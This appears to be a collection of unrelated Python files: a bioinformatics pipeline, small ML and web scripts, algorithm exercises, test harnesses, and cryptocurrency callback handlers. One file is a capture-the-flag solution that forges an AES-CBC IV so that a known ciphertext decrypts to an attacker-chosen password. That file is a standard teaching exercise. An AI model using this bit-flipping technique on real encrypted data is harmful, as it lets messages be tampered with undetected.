print "\nThis program depends on %s for aligning homologues. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ebi.ac.uk/pub/software/clustalw2/2.0.8\n\n" % name
missing = True
if not missing:
print "You should be good to go."
# if assertClustalw2Installed() and assertBlastInstalled():
# print "All dependencies are installed"
# #sys.exit()
return None
if options.onlinehelp:
webbrowser.open('http://kaspermunch.wordpress.com/statistical-assignment-package-sap/', new=2, autoraise=1)
#sys.exit()
return None
# Make a string of all options except of the ones with a '_'
# prefix which are for internal use only:
optionStr = ''
for k, v in options.__dict__.items():
if not re.match('_', k):
if type(v) is ListType:
if len(v) > 0:
joinString = ' --%s ' % k
v = [repr(x) for x in v]
optionStr += joinString + joinString.join(v)
elif v is True:
optionStr += ' --%s' % k
elif v is not False:
optionStr += ' --%s %s' % (k, v)
if options._align:
try:
plugin = findPlugin(options.alignment, 'sap.alignment')
except PluginNotFoundError, X:
raise AnalysisTerminated(1, "The plugin or file %s was not found." % X.plugin)
aligner = plugin.Aligner(options)
for fastaFileName in args:
aligner.align(fastaFileName)
elif options._sample:
try:
plugin = findPlugin(options.assignment, 'sap.assignment')
except PluginNotFoundError, X:
raise AnalysisTerminated(1, "The plugin or file %s was not found." % X.plugin)
assignment = plugin.Assignment(options)
for alignmentFileName in args:
try:
assignment.run(alignmentFileName)
except plugin.AssignmentError, X:
print X.msg
elif options._stats:
treeStatistics = TreeStatistics(options)
treeStatistics.runTreeStatistics(args, generateSummary=False)
# #######################################
# if options.ghostpopulation:
# ima = IMa.Assignment(options)
# ima.run(args)
# #######################################
else:
# Check that netblast and clustalw2 are installed:
from UtilityFunctions import findOnSystem
missing = False
if os.name in ('nt', 'dos'):
name = 'blastn.exe'
else:
name = 'blastn'
if not findOnSystem(name):
print "\nThis program depends on %s for searching databases. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ncbi.nlm.nih.gov/blast/executables/blast+/LATEST\n\n" % name
missing = True
if os.name in ('nt', 'dos'):
name = 'clustalw2.exe'
else:
name = 'clustalw2'
if not findOnSystem(name):
print "\nThis program depends on %s for aligning homologues. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ebi.ac.uk/pub/software/clustalw2/2.0.8\n\n" % name
missing = True
if missing:
return None
#
# print "Locating dependencies"
# assertClustalw2Installed()
# assertBlastInstalled()
# Make directories and write fixed inputfiles:
init = Initialize(options)
init.createDirs()
# Fix the format of input files and copy them to the project directory:
args, seqCount, sequenceNameMap = init.fixAndMoveInput(args)
if not args or not seqCount:
print "You need to specify file name of at least one non-empty sequence file in Fasta format."
sys.exit()
# Make sure cache is consistent with specified options:
init.checkCacheConsistency(args)
if options.hostfile:
pool = MachinePool.MachinePool(options.hostfile)
elif options.sge:
pool = SGE.SGE(nodes=options.sge)
fastaFileBaseNames = []
uniqueDict = {}
copyLaterDict = {}
# def getAllFromQueue(self, Q):
# """Generator to yield one after the others all item currently in
# the queue Q, without any waiting"""
# try:
# while True:
# yield Q.get_nowait()
# except Queue.Empty:
# raise StopIteration
#
# import Queue
# outputQueue = Queue.Queue()
# maxNrOfThreads = 5
# homologyThreadPool = HomologyThreadPool(options, outputQueue, maxNrOfThreads)
#
# # For each fasta file execute pipeline
# for fastaFileName in args:
# records += 1
# homologyThreadPool.put([fastaRecord, fastaFileName])
# homologyPoolStatus(homologyThreadPool)
#
# # Homology.py would need the same functionality that
# # SGE.py has so that the queue can be monitored and it can
# # be made sure that at most some number of threads are
# # running. The run method should then call compileHomologueset()
#
#
# while records:
# for record in self.getAllFromQueue(outputQueue):
# records -= 1
# # submit or run sub commands:
#
# homologyPoolStatus(homologyThreadPool)
#
# time.sleep(1)
#
# # Close the thread pool:
# homologyThreadPool.close()
# homologyPoolStatus(homologyThreadPool)
homolcompiler = HomolCompiler(options)
inputQueryNames = {}
# For each fasta file execute pipeline
for fastaFileName in args:
fastaFile = open(fastaFileName, 'r')
fastaFileBaseName, suffix = os.path.splitext(os.path.basename(fastaFileName))
fastaIterator = Fasta.Iterator(fastaFile, parser=Fasta.RecordParser())
fastaFileBaseNames.append(fastaFileBaseName)
inputQueryNames[fastaFileBaseName] = {}
for fastaRecord in fastaIterator:
#break
#homolcompiler = HomolCompiler(options)
# Discard the header except for the first id word:
fastaRecord.title = re.search(r'^(\S+)', fastaRecord.title).group(1)
inputQueryNames[fastaFileBaseName][fastaRecord.title] = True
print "%s -> %s: " % (fastaFileBaseName, fastaRecord.title)
# See if the sequence is been encountered before and if so skip it for now:
if uniqueDict.has_key(fastaRecord.sequence):
copyLaterDict.setdefault(uniqueDict[fastaRecord.sequence], []).append('%s_%s' % (fastaFileBaseName, fastaRecord.title))
print '\tsequence double - skipping...\n'
continue
else:
uniqueDict[fastaRecord.sequence] = '%s_%s' % (fastaFileBaseName, fastaRecord.title)
# Find homologues: Fasta files and pickled homologyResult objects are written to homologcache
homologyResult = homolcompiler.compileHomologueSet(fastaRecord, fastaFileBaseName)
cmd = ''
if homologyResult != None:
# The homologyResult object serves as a job carrying the relevant information.
print '\tIssuing sub-tasks:'
# Alignment using ClustalW. (Reads the fasta files
# in homologcache and puts alignments in
# options.alignmentcache)
print "\t\tClustalW2 alignment"
cmd += "%s %s --_align %s ; " \
% ('sap', optionStr, os.path.join(options.homologcache, homologyResult.homologuesFileName))
print "\t\tTree sampling using", options.assignment
cmd += "%s %s --_sample %s ; " % ('sap', optionStr, os.path.join(options.alignmentcache, homologyResult.alignmentFileName))
# Calculation of tree statistics. (Reads pickled
# blastresult objects from homologcache and writes
# to options.treestatscache)
print "\t\tTree statistics computation"
cmd += "%s %s --_stats %s" % ('sap', optionStr, os.path.join(options.homologcache, homologyResult.homologuesPickleFileName))
cmd = cmd.replace('(', '\(').replace(')', '\)')
if options.hostfile or options.sge:
try:
pool.enqueue(cmd)
except SGE.QsubError:
print "Error in submission of %s" % cmd
pass
else:
if sys.platform == 'win32':
# Windows CMD won't take long command lines:
cmds = cmd.split(';')
for cmd in cmds:
os.system(cmd)
else:
os.system(cmd)
# Output current status of parallel jobs
if options.hostfile or options.sge:
poolStatus(pool)
print ""
fastaFile.close()
if options.hostfile or options.sge:
# Wait for all jobs to finish:
pool.close()
# Output current status of parallel jobs
poolStatus(pool)
print "\tPool closed"
# Make dictionary to map doubles the ones analyzed:
doubleToAnalyzedDict = {}
for k, l in copyLaterDict.items():
doubleToAnalyzedDict.update(dict([[v,k] for v in l]))
if not options.nocopycache and len(doubleToAnalyzedDict):
# Copy cache files for sequences that occoured more than once:
print "Copying cached results for %d doubles" % len(doubleToAnalyzedDict)
copyCacheForSequenceDoubles(copyLaterDict, options)
# Calculate the pairwise differences between sequences in each file:
if options.diffs:
pairwisediffs = PairWiseDiffs(options)
pairwisediffs.runPairWiseDiffs(args)
#runPairWiseDiffs(args)
# Summary tree stats:
print 'Computing tree statistics summary...'
treeStatistics = TreeStatistics(options)
treeStatistics.runTreeStatistics(args, generateSummary=True, doubleToAnalyzedDict=doubleToAnalyzedDict, inputQueryNames=inputQueryNames)
print "done"
# Make HTML output:
print '\tGenerating HTML output...'
resultHTML = ResultHTML(options)
resultHTML.webify([options.treestatscache + '/summary.pickle'], fastaFileBaseNames, doubleToAnalyzedDict, sequenceNameMap)
print 'done'
except SystemExit, exitVal:
sys.exit(exitVal)
except AnalysisTerminated, exe:
print "\n\n", exe.msg
sys.exit(exe.exitValue)
# #########################
# except IOError, exe:
# os.system('lsof')
# print "".join(traceback.format_tb(sys.exc_info()[2]))
# print exe
# #########################
except Exception, exe:
print """
## SAP crashed, sorry ###################################################
Help creating a more stable program by sending all the debugging information
between the lines and your SAP version number to kaspermunch@gmail.com along
with *.sap file in the project folder and the sequence input file used.
"""
print "".join(traceback.format_tb(sys.exc_info()[2]))
print exe
if hasattr(exe, 'msg'):
print exe.msg
print "#########################################################################"
"""
simulate fasta seqquences using simulation pipeline
write an estimation procedure for sap that collects IMa results in a table
from SAP.PostAnalysis import IMa
ima = IMa.Assignment(options)
ima._benchmark(args)
_benchmark should take a sequence file of for each of the two candidate species as extra arguments (instead of downloading them)
should return a table row with results
loop over parameter grid
call my old simulation script
run IMa on simulated alignment
simulate two categories:
two seqs from the same small/large population
two seqs from different small/large populations with small/large split time
assess how much it matters that we have to assume the ancestral Ne
Introduction
Introduction about assignmnet, previous work, barcoding, bold progress, nr of species in the world the problem with unsampled species/populations, our idea for addressing this, outline of the method.
Methods
About sap and the framework.
About the IMa2 model (sang chul)
How sap and ima2 interacts
About the benchmark analysis
About the example analysis on Flycatchers
Results
Benchmark analysis
Dependence on:
diversity/divergence (probability of ILS)
how often do we make a wrong high confidence assignment with sap, and how often is this caught correctly by IMa
how reliable is a low outgroup statistic in assuring us that the true species is in the database.
When the outgroup statistic is low, how often does that mean the true species is missing?
If the outgroup statistic is high it can be so correctly because the sequence is an outgroup to the other in the db sample - which occurs more often with a small number of sequences in the database. When the outgroup statistic is misleadingly high, how often will IMa assign to the candidate species?
How dependent is IMa of the number of candidate sequences in the analysis?
What if we took all bold entries in genbank and assigned them excluding the correct species. What fraction of assignments would be high confidence wrong ones?
Example analysis
Use Coasim with no recombination to simulate homology data sets to pass to alignment, assignment and IMa
Make a benchmark_sap function in Consolescripts sap as sap but with this functionality instead of normal input
Make a way to summarize the result information
from SimulationPipeline.SimulatePipeHotspotCTMC import simulateCoasim
assert os.path.exists(os.path.abspath(bppseqgenOptionsFile))
def spec(**args):
c1 = args["N1"] / args["NeRef"]
c2 = args["N2"] / args["NeRef"]
c3 = args["N3"] / args["NeRef"]
c12 = args["N12"] / args["NeRef"]
c123 = args["N123"] / args["NeRef"]
t1 = args["T1"] / args["g"] / (2*args["NeRef"])
t12 = args["T12"] / args["g"] / (2*args["NeRef"])
t123 = args["T123"] / args["g"] / (2*args["NeRef"])
speciesTree = P(c123, M(t12, [P(c3, S(1)), P(c12, M(t1, [P(c1, S(1)), P(c2, S(1))]))]))
return speciesTree
seq = simulateCoasim(spec, length=L, NeRef=NeRef, r=0, g=g, u=u, addOutGroup=addOutGroup, \
T1=T1, T12=T12, T123=T123, \
N1=N1, N2=N2, N3=N3, N12=N12, N123=N123, \
optionsFile=os.path.abspath(bppseqgenOptionsFile))
print >>tmpOutputFile, seq
# Make a summary data structure
homologyResult = HomologySet(queryName=queryName,
origQueryName=origQueryName,
queryFasta=fastaRecord,
blastRecord=None,
homologues={},
options=self.options)
taxonomy = Taxonomy()
taxonomy.populateFromString('family:munch,genus:kasper,species:me')
#populateFromString(self, str, fieldsep=',', subfieldsep=':'):
for gi in ...:
# Make a homology object:
homologue = Homologue(gi=gi,
sequence=sequence,
significance = 0,
taxonomy=taxonomy)
homologyResult.homologues.apppend(homologue)
"""
if __name__ == "__main__":
main()
|
def f(x):
return x*x + 2*x
def fdx(x):
return 2*x + 2
#中点法,f为搜索的函数,fdx为f的导函数,interval 为搜索的区间
def MidPointMethod(fdx,interval):
e = 10**-8
a = float(interval[0])
b = float(interval[1])
while 1:
lambda_ = (a + b)/2
fdxl = fdx(lambda_)
if abs(fdxl) < e:
break
elif fdxl > 0:
# a = a
b = lambda_
else:
a = lambda_
#b = b
return lambda_
if __name__ == "__main__":
a = MidPointMethod(fdx,(-3,5))
print(a)
|
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.applications import ResNet152V2
from tensorflow.keras.applications.resnet_v2 import preprocess_input
from . import _utils
MODEL_NAME = 'resnet152v2'
IMAGE_SIZE = 224
def load_model(model_version = 'default'):
return _utils.load_model(MODEL_NAME, model_version)
def build_model(classes = 2):
inputs = Input(shape = (IMAGE_SIZE, IMAGE_SIZE, 3))
x = preprocess_input(inputs)
x = ResNet152V2(weights=None, classes=classes)(x)
model = Model(inputs=inputs, outputs=x)
model.compile(loss='categorical_crossentropy', metrics=['accuracy'])
return model
|
# Generated by Django 2.2 on 2021-06-18 12:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('produccion', '0008_auto_20210617_1959'),
]
operations = [
migrations.AddField(
model_name='catanimal',
name='det',
field=models.CharField(default=1, max_length=100, verbose_name='Nombre'),
preserve_default=False,
),
migrations.AlterField(
model_name='catanimal',
name='cat',
field=models.CharField(max_length=10, verbose_name='Categoría'),
),
]
|
import pygame
import numpy as np
import tkMessageBox
import math
import collections
class Mark:
""" Mark class for action of placing a mark on screen and checking for win
Attributs:
screen (pygame surface)
length (int/float) representing radius for a circle or width for a line
color (tuple) representing color rgb
pos (tuple): representing coordinates of the center point of grid on pygame surface when clicking a grid
pos_rot (tuple): representing new coordinates after rotating the axes for 45 degree
pos_list (list of tuples): a list of pos
pos_rot_list (list of tuples): a list of pos_rot
"""
def __init__(self,screen,length, color=None,pos=None,pos_rot=None,pos_list=None,pos_rot_list=None):
self.screen=screen
if color==None:
self.color=()
else:
self.color=color
if pos==None:
self.pos=()
else:
self.pos=pos
self.length=length
if pos_rot==None:
self.pos_rot=()
else:
self.pos_rot=pos_rot
if pos_list==None:
self.pos_list=[]
else:
self.pos_list=pos_list
if pos_rot_list==None:
self.pos_rot_list=[]
else:
self.pos_rot_list=pos_rot_list
def rotate_around_point_lowperf(self, radians=math.pi/4, origin=(0, 0)):
""" Function to calculate new coordinates after rotate axes aroud origin (0,0).
This function is copied from Lyle Scott's github from https://gist.github.com/LyleScott/e36e08bfb23b1f87af68c9051f985302
Args:
radians (float) degree to rotate axes
origin (tuple)
Returns:
tuple : new coordinates
"""
x,y=self.pos
ox, oy = origin
qx = ox + math.cos(radians) * (x - ox) + math.sin(radians) * (y - oy)
qy = oy + -math.sin(radians) * (x - ox) + math.cos(radians) * (y - oy)
self.pos_rot=(qx,qy)
return self.pos_rot
def set_center(self):
""" Function to find center point in a grid when placing a mark in a grid
Args:
None
Returns:
pos (tuple): center point coordinates of a grid
pos_list (list of tuples) : a list of pos tuple
pos_rot_list (list of tuples) : a list of new coordinates of pos after rotate axes
"""
center_points=np.array([[100, 300, 500],[100, 300, 500]])
pos_arr=np.array([[self.pos[0]],[self.pos[1]]])
idx = np.abs((center_points - pos_arr)).argmin(axis=1)
center=center_points.flat[idx]
self.pos=(center[0],center[1])
self.pos_rot=self.rotate_around_point_lowperf()
self.pos_list.append(self.pos)
self.pos_rot_list.append(self.pos_rot)
return self.pos,self.pos_list,self.pos_rot_list
def check_game(self):
"""
function to check if a player won the game
Args:
None
Returns:
True or False : if a player won, return False to stop the while loop, otherwise True to continue
"""
## if there is less than 3 of a type of mark on the pygame surface, don't check
if len(self.pos_list)<3:
return True
## if there are three idential x or y center cooridnates of a type of mark, one player has his marks on horizontal or vertical line.
## if there are three idential x or y center cooridnates of a type of mark after rotating axes, one player has his marks on diagonal line.
elif 3 in [i[1] for i in collections.Counter([i[0] for i in self.pos_list]).most_common()]\
or 3 in [i[1] for i in collections.Counter([i[1] for i in self.pos_list]).most_common()]\
or 3 in [i[1] for i in collections.Counter([np.round(i[0],0) for i in self.pos_rot_list]).most_common()]\
or 3 in [i[1] for i in collections.Counter([np.round(i[1],0) for i in self.pos_rot_list]).most_common()]:
return False
else:
return True
|
# -*- coding: utf-8 -*-
"""
@author: Kotarou
"""
from entity import Component
from pyglet.window import key
from .KeyComponent import *
class KeyPressComponent(KeyComponent):
# def __init__(self, key, string="Whatever!"):
# self.response = string
# self.key = key
# self.hoverTime = 0
# self.active = False
def __init__(self, actions):
super().__init__()
self.actions = actions
self.active = False
def respond(self, input):
self.parse(self.actions[input])
#print(self.response)
|
'''
No Crypto (Crypto 200)
The folowing plaintext has been encrypted using an unknown key, with AES-128 CBC:
Original: Pass: sup3r31337. Don't loose it!
Encrypted: 4f3a0e1791e8c8e5fefe93f50df4d8061fee884bcc5ea90503b6ac1422bda2b2b7e6a975bfc555f44f7dbcc30aa1fd5e
IV: 19a9d10c3b155b55982a54439cb05dce
How would you modify it so that it now decrypts to: "Pass: notAs3cre7. Don't loose it!"
This challenge does not have a specific flag format.
'''
from Crypto.Cipher import AES
problem = "Pass: notAs3cre7. Don't loose it!"
original = "Pass: sup3r31337. Don't loose it!"
encrypted = "4f3a0e1791e8c8e5fefe93f50df4d8061fee884bcc5ea90503b6ac1422bda2b2b7e6a975bfc555f44f7dbcc30aa1fd5e".decode("hex")
iv = "19a9d10c3b155b55982a54439cb05dce".decode("hex")
def xor_strings(xs, ys):
return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))
print xor_strings(problem, original).encode("hex")
diff = xor_strings(problem[:16], original[:16])
print diff.encode("hex")
new_iv = xor_strings(iv,diff)
print new_iv.encode("hex")
#aes = AES.new(key, AES.MODE_CBC, iv).encrypt(original) |
import math as m
import matplotlib.pyplot as plt
import numpy as np
import scipy.sparse as sp
from matplotlib.collections import LineCollection
from scipy import spatial
plt.rcParams['figure.figsize'] = [5, 3]
filename = "SampleCoordinates.txt"
radius = 0.06
def read_coordinate_file(filename):
"""Läser .txt filer med lista över koordinater formaterade enligt {a, b} och listar dem som Mercator projection """
def x_factor(b):
x = b * m.pi/180
return x
def y_factor(a):
y = np.log(m.tan((m.pi/4) + (a * m.pi/360)))
return y
x_lst = []
y_lst = []
with open(filename) as file:
# Öppnar angivna filen
for line in file:
# Ta bort klutter och konvertera till Mercator projection
line = line.strip("{}\n")
a, b = line.split(',')
x_lst.append(x_factor(float(b)))
y_lst.append(y_factor(float(a)))
coord_list = np.array((x_lst, y_lst))
return coord_list
coord_list = read_coordinate_file(filename)
# print((read_coordinate_file(filename)))
def construct_graph_connections(coord_list, radius):
"""Funktion som svarar vilka koordinater som är inom givna radien till varandra samt avståndet mellan dem. """
x = coord_list[0] # koordinater
y = coord_list[1]
lst = []
indices = []
dist = []
for nr, X in enumerate(x): # numrerar listan
lst.append([nr, X, y[nr]])
for coord in lst:
for coord_test in lst:
r = m.sqrt(((coord_test[2]-coord[2])**2) + (coord_test[1]-coord[1])**2) # Avståndsformeln
if coord[0] == coord_test[0]:
continue
elif r < radius:
indices.append([coord[0], coord_test[0]]) #med koordinater indices.append([coord[0], coord_test[0], [coord[1:3]], [coord_test[1:3]]])
dist.append(r)
return indices, dist
N = len(coord_list)
distance = construct_graph_connections(coord_list, radius)[1]
indices = construct_graph_connections(coord_list, radius)[0]
print(np.array(coord_list).T)
def construct_graph(indices, distance, N):
mtx = sp.csr_matrix((distance, np.array(indices).T), shape=(N, N))
return mtx
def plot_points(coord_list, indices):
"""Plottar och numrerar koordinater"""
fig, ax = plt.subplots(1, figsize=(10, 6))
fig.suptitle('Koordinater')
sz = coord_list.shape[1]
line = coord_list.T
line = line[np.array(indices)]
lines = LineCollection(line, linewidths=0.1, colors="b")
n = np.linspace(1, sz, sz)
coord_x, coord_y = np.split(read_coordinate_file(filename), 2)
ax.add_collection(lines)
plt.scatter(coord_x, coord_y) # plottar givna koordinater
coord_x = coord_x.reshape(sz, 1)
coord_y = coord_y.reshape(sz, 1)
for k, txt in enumerate(n):
plt.annotate(txt-1, (coord_x[k], coord_y[k])) # numrerar koordinaterna i plotten
plt.show()
plot_points(read_coordinate_file(filename), indices)
|
import cv2
import pickle
data = pickle.load(open("/Users/balazs/real_data/data_training.pkl", 'rb'))
for image, truth in data:
if len(truth) > 50:
print(truth)
cv2.imshow("image", image)
cv2.waitKey(0) |
#!/usr/bin/python
print "Content-type: text/html"
print
#print "<pre>"
import cgitb
import cgi
from osgeo import gdal,ogr
import struct
cgitb.enable()
form = cgi.FieldStorage()
mx = float(form.getvalue('lon'))
my = float(form.getvalue('lat'))
rast='/var/www/html/CartoLabFS16/Carto-Lab-Terroni/Map/Data/wellington5m.tif' #../
#open raster layer
src_ds=gdal.Open(rast)
gt=src_ds.GetGeoTransform()
#print gt
rb=src_ds.GetRasterBand(1)
#bandtype = gdal.GetDataTypeName(rb.DataType)
#print bandtype
gdal.UseExceptions() #so it doesn't print to screen everytime point is outside grid
#coordinates of desired pt
#to pixel
px = int((mx - gt[0]) / gt[1]) #x pixel
py = int((my - gt[3]) / gt[5]) #y pixel
#print px,py
try: #in case raster isnt full extent
structval=rb.ReadRaster(px,py,1,1,buf_type=gdal.GDT_Float32) #Assumes 32 bit int- 'float'
intval = struct.unpack('f' , structval) #assume float
val=intval[0]
except:
val=-9998 #or some value to indicate a fail
src_ds=None
ds=None
#print val
#174.855212,-41.18947
print(val)
#print "</pre>"
|
import re
sentences = []
with open('../../../data/nlp.txt', mode='r') as f:
sentences.extend(re.split(r'[.;:?!]\s+(?=[A-Z])', f.read().strip()))
if __name__ == '__main__':
for sentence in sentences:
print(sentence)
|
# import calendar
import common
import sfc_netconf_regression_messages as sfc_nrm
import subprocess
import argparse
import time
import requests
__author__ = "Reinaldo Penno"
__author__ = "Andrej Kincel"
__copyright__ = "Copyright(c) 2014, Cisco Systems, Inc."
__license__ = "New-style BSD"
__version__ = "0.3"
__email__ = "rapenno@gmail.com"
__email__ = "andrej.kincel@gmail.com"
__status__ = "Tested with SFC-Karaf distribution as of 02/06/2015"
# java -Xmx1G -XX:MaxPermSize=256M -jar \
# netconf-testtool-0.3.0-20150320.211342-654-executable.jar
def run_netconf_tests():
process = None
device_name = "sfc-netconf"
print("Starting Netconf Server")
try:
process = subprocess.Popen(
['java', '-Xmx1G', '-XX:MaxPermSize=256M', '-jar',
'netconf-testtool-0.3.0-20150320.211342-654-executable.jar',
'--device-count', '2'])
time.sleep(5)
except subprocess.CalledProcessError as e:
print(e.output)
return
# input("Press Enter to continue to Auto-Provisioning...")
try:
common.post_netconf_connector(
common.NETCONF_CONNECTOR_URL,
sfc_nrm.NETCONF_CONNECTOR_XML.format(device_name, "localhost"))
time.sleep(5)
common.check(
common.SFF_ONE_URL.format(device_name),
sfc_nrm.SERVICE_FUNCTION_FORWARDER_NETCONF_JSON,
"Checking if Netconf SFF was created successfully")
input("Press Enter to finish tests")
except requests.exceptions.RequestException:
print("Error sending POST request to spawn netconf connector \n")
finally:
print("Finishing Tests...")
process.kill()
return
def main():
run_karaf = False
p = None
#: setup parser -----------------------------------------------------------
parser = argparse.ArgumentParser(
description='SFC Basic RestConf Regression',
usage=("\npython3.4 sfc_netconf_regression --run-karaf "))
parser.add_argument('--run-karaf', action='store_true',
help='Create SFC Karaf instance automatically')
#: parse CMD arguments ----------------------------------------------------
args = parser.parse_args()
if args.run_karaf:
run_karaf = True
# + str(calendar.timegm(time.gmtime()))
try:
if run_karaf:
p = common.initialize_karaf()
if common.check_sfc_initialized(p):
run_netconf_tests()
p.terminate(force=True)
else:
print("Bypassing tests..")
# bundle_pattern = 'list \| grep sfc-netconf\s+\w+\s\|\s(\w+)(.+)'
# child.expect('opendaylight-user', timeout=10)
# child.sendline('bundle:list | grep sfc-netconf')
# child.expect(bundle_pattern)
# netconf_state, right = child.match.groups()
else:
run_netconf_tests()
except KeyboardInterrupt:
pass
finally:
if p:
p.terminate(force=True)
if __name__ == "__main__":
main()
|
from lazysql import Base, update_all, viewtable, db
class User(Base):
__tablename__ = 'users'
user_id = ('SERIAL', 'PRIMARY KEY')
username = ('varchar(256)', 'NOT NULL')
class Post(Base):
__tablename__ = 'posts'
post_id = ('SERIAL', 'PRIMARY KEY')
text = ('varchar', 'NOT NULL')
update_all()
a = User()
print(a.username)
a.create(user_id=29, username='john')
print(a.username)
b = a.selectone(user_id=29)
print(b.username)
print(viewtable(User))
db.close()
|
"""
Number of Paths
You’re testing a new driverless car that is located at the Southwest (bottom-left) corner of an n×n grid.
The car is supposed to get to the opposite, Northeast (top-right), corner of the grid. Given n, the size of the grid’s axes,
write a function numOfPathsToDest that returns the number of the possible paths the driverless car can take.
altthe car may move only in the white squares
For convenience, let’s represent every square in the grid as a pair (i,j).
The first coordinate in the pair denotes the east-to-west axis, and the second coordinate denotes the south-to-north axis.
The initial state of the car is (0,0), and the destination is (n-1,n-1).
The car must abide by the following two rules: it cannot cross the diagonal border.
In other words, in every step the position (i,j) needs to maintain i >= j. See the illustration above for n = 5.
In every step, it may go one square North (up), or one square East (right), but not both. E.g. if the car is at (3,1),
it may go to (3,2) or (4,1).
Explain the correctness of your function, and analyze its time and space complexities.
Example:
input: n = 4
output: 5 # since there are five possibilities:
# “EEENNN”, “EENENN”, “ENEENN”, “ENENEN”, “EENNEN”,
# where the 'E' character stands for moving one step
# East, and the 'N' character stands for moving one step
# North (so, for instance, the path sequence “EEENNN”
# stands for the following steps that the car took:
# East, East, East, North, North, North)
Constraints:
[time limit] 5000ms
[input] integer n
1 ≤ n ≤ 100
[output] integer
Grid 문제 dp
grid 경로 문제에서(대각선 이동 불가능 전제)
0 . 0 . 0 . 5
0 . 0 . 2 . 5
0 . 1 . 2 . 3
1 . 1 . 1 . 1
어느 지점 b로 오는 것을 두개의 누적경로 값(a, d)을 그냥 더하면 되는 이유는
b까지의 경로는 a까지의 경로 + d까지의 경로
a b
c d
조건상 해당 두 지점에서 밖에 올수 없는데
각각의 지점 까지 온 개수의 합을 하면 그게 b까지 오는 지점이 된다.
왜냐면 b까지는 해당 두지점으로부터 밖에 올수 없고,
두 지점까지의 경로의 개수가 각각 그것이므로.
* 누적 값의 합에 의해 변경해주는 순서는 Row by Row 헷갈리지 말 것.
* 처음에 모서리에 1을 깔아주는 이유는 그곳은 대각선이 아니므로 그곳으로 오는 두지점이란게 존재하지 않고,
오로지 그곳으로의 하나의 경로만 있기 떄문에 base로 깔아주는 것.
아래의 문제에선 조건이 하나 더있다. y(column) >= x(row) 여야만 한다.
각각의 문제의 조건을 잘 확인할 것.
"""
"""
Attention:
Explanation's (i, j) referring (col, row) => So, that can be translated to => (i >= j) == (col >= row)
(i)------->
x x x x |
x x x x |
x x x x |
x x x x V
(j)
# set 1 all of the first i line except the starting point
# That's because the way of each point of the line is only one
# Then we will go to every point we can(by the constrint >=j) and then we will add up its (i-1) and (j-1)
# Then we can just simply return the last one
"""
def num_of_paths_to_dest(n):
if n == 1:
return 1
dp = [[0] * n for _ in range(n)]
dp[0] = [1] * n
dp[0][0] = 0
for row in range(n):
for col in range(n):
if row > 0 and col > 0 and col >= row:
dp[row][col] = dp[row][col - 1] + dp[row - 1][col]
return dp[-1][-1]
"""
0 1 1 1
0 1 2 3
0 0 2 5
0 0 0 5
"""
# Condition: i >= j
# i is for column, j is for row
# Time complexity: O((n-1)^2)
# Space compelxity: O(n^2)
def num_of_paths_to_dest(n):
dp = [[0] * n for _ in range(n)]
dp[0] = [1] * n
for j in range(1, n):
for i in range(1, n):
if i >= j:
dp[j][i] = dp[j - 1][i] + dp[j][i - 1]
return dp[n - 1][n - 1]
test = num_of_paths_to_dest(4)
print(test)
|
"""Exemple of handling callback from cyphernode"""
from libcn.libcn import CallbackServer
import json
class WaitCallback(CallbackServer):
"""Exemple of using 'CallbackServer' class for handling callbacks and execute actions.
Each functions must reflect the callbacks url used in cyphernode callbacks config.
For exemple, a watched address with callback url 'http://url:port/conf' need
a function called 'conf' to be handled by this class. The 'return' statement will
send the returned value to the coresponding response topîc. If no 'return'
statement is used, a string value of 'True' is sent. If the function fail or if
the function do not exist, a string value of 'False' is sent."""
def __init__(self, port):
"""Initialyse CallbackServer options"""
#super.__init__(CallbackServer)
self.port = port
def unconf(self):
"""Do stuff with not confirmed paiment callbacks
fields = ['id', 'address', 'hash', 'vout_n', 'sent_amount', \
'confirmations', 'received', 'size', \
'vsize', 'fees', 'is_replaceable', 'pub32', \
'pub32_label', 'pub32_derivation_path', 'eventMessage']"""
if self.callback:
call = json.loads(self.callback)
amount = call['sent_amount']
amount = format(amount, '.8f')
amount = '{} ₿'.format(amount)
fees = call['fees']
fees = format(fees, '.8f')
fees = '{} ₿'.format(fees)
#print('Paiment non confirmé = {}'.format(call))
print('Adresse \'{}\' received {} at {} and the transaction fees is {}'\
.format(call['address'], amount, call['received'], fees))
def conf(self):
"""Do stuff with confirmed paiment callbacks"
fields = ['id', 'address', 'hash', 'vout_n', 'sent_amount', \
'confirmations', 'received', 'size', \
'vsize', 'fees', 'is_replaceable', 'pub32', \
'pub32_label', 'pub32_derivation_path', 'eventMessage']"""
if self.callback:
call = json.loads(self.callback)
amount = call['sent_amount']
amount = format(amount, '.8f')
amount = '{} ₿'.format(amount)
fees = call['fees']
fees = format(fees, '.8f')
fees = '{} ₿'.format(fees)
#print('Paiment non confirmé = {}'.format(call))
print('Confirmation of adresse \'{}\' received {} at {} and the transaction fees is {}'\
.format(call['address'], amount, call['received'], fees))
def txunconf(self):
"""Do stuff with unconfirmed transation callbacks
fields = ['id', 'txid', 'confirmations']"""
if self.callback:
call = json.loads(self.callback)
print('Transaction non confirmé = {}'.format(call))
def txconf(self):
"""Do stuff with confirmed transaction callbacks"
fields = ['id', 'txid', 'confirmations']"""
if self.callback:
call = json.loads(self.callback)
print('Transaction confirmé = {}'.format(call))
def ln_invoice(self):
"Do stuff with lightning invoice callbacks"
if self.callback:
call = json.loads(self.callback)
print('Lightning invoice confirmé = {}'.format(call))
def ln_connect(self):
"Do stuff with lightning connected node callbacks"
if self.callback:
call = json.loads(self.callback)
print('lightning connect confirmé = {}'.format(call))
def ots_stamp(self):
"Do stuff with ots callbacks"
if self.callback:
call = json.loads(self.callback)
print('OTS stamp confirmé = {}'.format(call))
WCB = WaitCallback(2906)
print('WaitCallback running ....')
WCB.start()
|
import json
import pickle
import sys
import getopt
from os import listdir
from os.path import isfile, join
import random
import pandas as pd
def checkinexclusion(nodename):
with open('./nodes/exclusion.nodes', 'r') as nodelines:
for x in nodelines.readlines():
# print(nodename)
if x.strip() == nodename:
return
return nodename
datadir = './nodes/node_data/'
crimfiles = [f for f in listdir(datadir) if isfile(join(datadir, f))]
while True:
crmid = random.randint(0, 10000)
if not crmid in crimfiles:
break
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, 'hnf:om:', ['help', 'nonodes', 'inputjson=', 'printoutput', 'crimeid=', 'personname='])
except getopt.GetoptError:
print('Something went wrong!')
